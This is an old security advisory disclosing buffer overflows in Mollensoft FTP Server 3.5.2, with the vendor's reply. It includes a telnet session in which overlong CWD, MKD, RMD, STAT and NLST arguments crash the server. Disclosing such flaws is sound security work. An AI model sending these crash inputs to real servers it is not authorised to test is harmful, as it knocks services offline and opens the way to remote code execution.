Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) Release Date: June 4, 2003 Severity: High (remote crash - code execution) Systems Affected: Mollensoft FTP Server 3.5.2 (possibly all older versions) Here is the email i got from the company when i informed them about the holes: ---------------------------------------------------------------------------------- From services@mollensoft.com Wed Jun 4 18 : 33:50 2003 Return-Path : Received : from mta2.wss.scd.yahoo.com (mta2.wss.scd.yahoo.com [66.218.85.33]) by monster.phaistosnetworks.gr (8.12.8/8.12.8) with ESMTP id h54FXlQN003884 for ; Wed, 4 Jun 2003 18:33:48 +0300 Received : from dragonultra (66.91.163.96) by mta2.wss.scd.yahoo.com (7.0.016) (authenticated as services@mollensoft.com) id 3EDCE7600005EB6A for dr_insane@pathfinder.gr; Wed, 4 Jun 2003 08:30:55 -0700 From : "Services" To : XXXX XXXXX topic : RE: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY ADVISORY date : Wed, 4 Jun 2003 05:30:34 -0700 Message-ID : MIME-Version : 1.0 Content-Type : text/plain; charset="Windows-1252" Content-Transfer-Encoding : 8bit X-Priority : 3 (Normal) X-MSMail-Priority : Normal X-Mailer : Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MIMEOLE : Produced By Microsoft MimeOLE V6.00.2600.0000 Importance : Normal In-reply-to : <200306041525.h54FPe0p029006@monster.phaistosnetworks.gr> Howdy, Thank you very much. I am working on a fix, should be out soon. Thanks for your help. V/R, BIGAL bigal@mollensoft.com -----Original Message----- From: xxxxx xxxxxx [mailto:dr_insane@pathfinder.gr] Sent: Wednesday, June 04, 2003 8:26 AM To: support@mollensoft.com Subject: Mollensoft FTP Server 3.5.2 ( or Hyperion ftp server) SECURITY ADVISORY Hello, Yesterday i downloaded Mollensoft FTP Server 3.5.2. While i was checking it i found some serious buffer overflows in the cwd,mkd,rmd,stat,nlst commands. I am sending you an advisory in order to fix the problems. i hope you will respond! --------------------------------------------------------------------------- Description: Many buffer overflow discovered while i was checking the last version of Hyperion Ftp server.Any user can exploit these vulnerabilities to crash the server remotely or to execute arbitary code ( an exploit will be released for this).Various structures can be overwritten in the process heap to gain control of the remote Ftp server with administrator privileges. Let's r0ck (or exploit code ---------------------------- The following examples will show the vulnerable conditions. C:\>telnet localhost 21 220 Mollensoft FTP Server 3.5.2 Ready. user anonymous 331 Password required for anonymous. pass ins@qwerty.gr 230 User anonymous logged in. CWD 344 * A overflow..crash... Stat 340 * A overflow..crash... mkd 270 * A overflow..crash... xmkd 270 * A overflow..crash... rmd 270 * A overflow..crash... nlst 340 * A overflow..crash... By supplying one of these commands above the ftp server will crash:> Credit: Dr_insane Feedback: Please send comments to: dr_insane@pathfinder.gr http://members.lycos.co.uk/r34ct/